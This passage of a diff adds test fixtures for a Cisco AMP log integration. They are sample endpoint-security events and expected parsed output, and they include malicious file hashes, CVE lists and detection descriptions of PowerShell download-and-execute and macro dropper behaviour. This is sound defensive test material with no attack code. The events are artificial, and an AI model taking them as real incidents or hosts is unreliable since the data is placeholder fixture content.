Id=CVE-2015-2380"},{"cve":"CVE-2015-2424","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2424"},{"cve":"CVE-2016-0127","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0127"},{"cve":"CVE-2016-7193","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7193"},{"cve":"CVE-2017-0292","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0292"},{"cve":"CVE-2017-11826","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11826"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508159571352093000,"timestamp":1610533415,"timestamp_nanoseconds":349000000,"date":"2021-01-13T10:23:35+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515298360312529000,"timestamp":1610532793,"timestamp_nanoseconds":312509000,"date":"2021-01-13T10:13:13+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610532793,"start_date":"2021-01-13T10:13:13+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"PowerShell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515298355162029000,"timestamp":1610532788,"timestamp_nanoseconds":162019000,"date":"2021-01-13T10:13:08+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610532788,"start_date":"2021-01-13T10:13:08+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"PowerShell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508153524038140000,"timestamp":1610532007,"timestamp_nanoseconds":606000000,"date":"2021-01-13T10:00:07+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6508153524038139905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521062325693667300,"timestamp":1610447087,"timestamp_nanoseconds":693632000,"date":"2021-01-12T10:24:47+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610447087,"start_date":"2021-01-12T10:24:47+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. 
Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6532910514396201000,"timestamp":1610446522,"timestamp_nanoseconds":872000000,"date":"2021-01-12T10:15:22+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525520937264087000,"timestamp":1608875349,"timestamp_nanoseconds":661000000,"date":"2020-12-25T05:49:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.GenericKD:Malwaregen.21do.1201","detection_id":"6525520937264087041","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"OLD.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\OLD.exe","identity":{"sha256":"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9","sha1":"26de43cc558a4e0e60eddd4dc9321bcb5a0a181c","md5":"cfdd16225e67471f5ef54cab9b3a5558"},"parent":{"process_id":2632,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef","sha1":"84123a3decdaa217e3588a1de59fe6cee1998004","md5":"38ae1b3c38faef56fe4907922f0385ba"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525520937264087000,"timestamp":1608875349,"timestamp_nanoseconds":661000000,"date":"2020-12-25T05:49:09+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6525520937264087041","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525516191325225000,"timestamp":1608874244,"timestamp_nanoseconds":500000000,"date":"2020-12-25T05:30:44+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Auto.F2863A.211556.in02","detection_id":"6525516191325224961","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"twhy.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Roaming\\twhy.exe","identity":{"sha256":"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117","sha1":"7d9518ea3f98d037745352b23861fab05d3777dc","md5":"c624d61b8f076c3ef05f74eeb96c8954"},"parent":{"process_id":4868,"disposition":"Clean","file_name":"powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7","sha1":"04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d","md5":"92f44e405db16ac55d97e3bfe3b132fa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525516191325225000,"timestamp":1608874244,"timestamp_nanoseconds":500000000,"date":"2020-12-25T05:30:44+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6525516191325224961","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1519340132516139000,"timestamp":1608874241,"timestamp_nanoseconds":516130000,"date":"2020-12-25T05:30:41+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1608874241,"start_date":"2020-12-25T05:30:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. 
Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1519340132474871000,"timestamp":1608874241,"timestamp_nanoseconds":474861000,"date":"2020-12-25T05:30:41+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1608874241,"start_date":"2020-12-25T05:30:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. 
This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193384389977,"timestamp":1608872547,"timestamp_nanoseconds":0,"date":"2020-12-25T05:02:27+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608872547,"start_date":"2020-12-25T05:02:27+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"mshtml.dll","identity":{"sha256":"d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}},"vulnerabilities":[{"name":"Microsoft Internet 
Explorer","version":"11","cve":"CVE-2018-0762","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762"},{"cve":"CVE-2018-0772","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193384371995,"timestamp":1608872546,"timestamp_nanoseconds":0,"date":"2020-12-25T05:02:26+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608872546,"start_date":"2020-12-25T05:02:26+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"mshtml.dll","identity":{"sha256":"1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}},"vulnerabilities":[{"name":"Microsoft Internet Explorer","version":"11","cve":"CVE-2018-0762","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762"},{"cve":"CVE-2018-0772","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772"}]}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193366641599,"timestamp":1608870773,"timestamp_nanoseconds":0,"date":"2020-12-25T04:32:53+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608870773,"start_date":"2020-12-25T04:32:53+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"OUTLOOK.EXE","identity":{"sha256":"465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc"},"parent":{"disposition":"Clean","identity":{"sha256":"71854d2c40664493e05c0a7e4f0c7cc74ada1a63eec1d4fe32350f6af8728243"}}},"vulnerabilities":[{"name":"Microsoft 
Office","version":"2016","cve":"CVE-2017-0106","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0106"},{"cve":"CVE-2017-11774","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11774"},{"cve":"CVE-2017-8506","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8506"},{"cve":"CVE-2017-8507","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8507"},{"cve":"CVE-2017-8571","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8571"},{"cve":"CVE-2017-8663","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8663"},{"cve":"CVE-2018-0791","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0791"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525498672153625000,"timestamp":1608870165,"timestamp_nanoseconds":878000000,"date":"2020-12-25T04:22:45+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525494703603843000,"timestamp":1608869241,"timestamp_nanoseconds":928000000,"date":"2020-12-25T04:07:21+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":2872,"scanned_processes":49,"scanned_paths":0,"malicious_detections":0}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525494527510184000,"timestamp":1608869200,"timestamp_nanoseconds":537000000,"date":"2020-12-25T04:06:40+00:00","event_type":"Scan 
Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan"}}}
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco_amp1.ndjson.log-expected.json b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco_amp1.ndjson.log-expected.json
new file mode 100644
index 00000000000..3ef7fced190
--- /dev/null
+++ b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco_amp1.ndjson.log-expected.json
@@ -0,0 +1,4041 @@ +{ + "expected": [ + { + "@timestamp": "2021-01-14T10:33:46.000Z", + "file": { + "name": "MspthrdHash.exe", + "path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe", + "hash": { + "sha1": "128aa78059540cf0cdae2a3cea30cd80e00f2046", + "sha256": "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837", + "md5": "c877b67a5733c59d0d8ed8d519df0c91" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_Qakbot_1" + ], + "hash": [ + "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837", + "c877b67a5733c59d0d8ed8d519df0c91", + "128aa78059540cf0cdae2a3cea30cd80e00f2046" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "os": { + "family": "windows", + "platform": "windows" + }, + "name": "Demo_Qakbot_1", + "hostname": "Demo_Qakbot_1" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:32:35.701333474Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":742000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective 
Detection\",\"event_type_id\":553648147,\"detection\":\"W32.12081E6CA3-95.SBX.TG\",\"detection_id\":\"6411425813945647105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\",\"sha1\":\"128aa78059540cf0cdae2a3cea30cd80e00f2046\",\"md5\":\"c877b67a5733c59d0d8ed8d519df0c91\"}}}}", + "kind": "alert", + "action": "Retrospective Detection", + "id": "6411425813945647000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.12081E6CA3-95.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "f9:65:da:22:2a:41", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "f9:65:da:22:2a:41" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6411425813945647105", + "event_type_id": 553648147 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-14T10:15:29.000Z", + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + 
